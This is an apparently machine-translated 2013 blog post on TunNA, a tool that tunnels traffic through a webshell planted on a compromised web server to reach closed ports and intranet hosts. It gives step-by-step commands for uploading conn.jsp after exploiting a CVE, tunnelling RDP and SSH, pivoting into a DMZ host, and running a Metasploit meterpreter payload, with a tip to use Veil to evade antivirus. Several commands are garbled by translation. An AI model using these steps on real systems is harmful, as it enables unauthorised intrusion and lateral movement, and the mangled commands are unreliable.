Mickey · 2013/09/28 22:56
How it works: HTTP Tunneling
#! php +-------------------------------------------+ +-------------------------------------------+ | Local Host | | Remote Host | |-------------------------------------------| |-------------------------------------------| | +----------+ +------------+ | +-------------+ | +------------+ +----------+ | | |Client App|+----->|Local Proxy |<==========| Firewall |======>| Webshell |+------>|Server App| | | +----------+ +------------+ | +-------------+ | +------------+ +----------+ | +-------------------------------------------+ +------------------------------------------ +Copy the code
The tool uses proxy.py to listen on a local port, and then connects to the Webshell deployed on the remote WEB. The remote Webshell forwards port forwarding requests to the local host or the remote host on the local Intranet, thus implementing HTTP Tunneling. This is a very useful tool for Intranet intrusion.
Does this tool look familiar? Yeah. In fact, the principle is the same as ReDUh, but TunNA is more stable and faster.
Download the address is: www.secforce.com/media/tools…
Here are four examples to get a handle on how to use the tool.
Example 1:
The website only opens port 80, and other ports are closed. After obtaining JSP WEBSHELL through CVE-2013-225, conn. JSP is uploaded and forwarded to realize connection to other ports of the machine.
Direct scan shows 3389 is off
[email protected]:~# nmap-ss-p3389 219.x.x.x Starting nmap 6.40 (http://nmap.org) at 2013-09-26 22:47 EDT NMAP Scan report for X Host is up (latency). PORT STATE SERVICE 3389/ TCP closeCopy the code
Upload conn.jsp to the host via Webshell and the connection starts locally
python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v
Copy the code
The meanings of the parameters are as follows:
-l Indicates the local listening port. -r Indicates the remote forwarding port. -v Indicates the detailed modeCopy the code
And then execute it locally
Rdesktop 127.0.0.1:1234Copy the code
You can now connect to 3389 of the target
Example 2:
For some services, such as SSH, you need to add the -s parameter to ensure that the connection will not be interrupted.
python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s
ssh localhost -p 1234
Copy the code
Example 3:
Scenario: We have obtained the JSPSHELL of a host in the DMZ, and the internal IP address of the host is 172.16.100.20. By checking points, we find that there are other hosts in the DMZ (172.16.100.20), and 3389 is opened. We want to use HTTP Tunneling, attached to 3389 at 172.16.100.20, is as follows
Python2.7 proxy. Py -u http://219.x.x.x/conn.jsp - 1234 - a l 172.16.100.20 r - 3389Copy the code
There is an extra -a parameter, meaning the IP address to be forwarded
Example 4:
Veil is also available for those who like Metasploit, but if the opponent has a soft kill, veil is recommended to do the meterpreter free first.
First turn on the tunna_exploit. The rb copy to MSF modules/exploits/Windows/misc directory.
cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc
Copy the code
And then you start using
msf > use exploit/windows/misc/tunna_exploit msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => Windows /meterpreter/bind_tcp MSF exploit(tunna_exploit) > set RHOST 1.3.3.7 1.3.3.7 MSF exploits (tunna_exploit) > set TARGETURI TARGETURI = > http://219.x.x.x:8080/conn.jsp http://219.x.x.x:8080/conn.jsp msf exploit(tunna_exploit) > set VERBOSE true VERBOSE => true msf exploit(tunna_exploit) > exploit -jCopy the code
Tunna supports the following environments and scripts in addition to JSPS
conn.jsp Tested on Apache Tomcat (windows + linux) conn.aspx Tested on IIS 6+8 (windows server 2003/2012) conn.php Tested on LAMP + XAMPP + IIS (windows + linux)
When using metasploit, note that the scripts in metasploit only correspond to metasploit.